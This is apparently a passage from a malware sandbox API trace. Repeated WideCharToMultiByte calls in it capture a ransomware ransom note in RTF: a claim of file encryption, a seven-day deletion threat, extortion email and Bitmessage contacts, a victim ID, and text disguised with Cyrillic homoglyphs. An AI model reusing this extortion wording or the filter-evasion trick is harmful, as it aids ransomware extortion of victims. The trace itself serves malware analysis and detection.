nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.090] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24607d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nêpñ\x03]Ä\x0bõ5B\x18,", lpUsedDefaultChar=0x0) returned 8717 [0269.090] 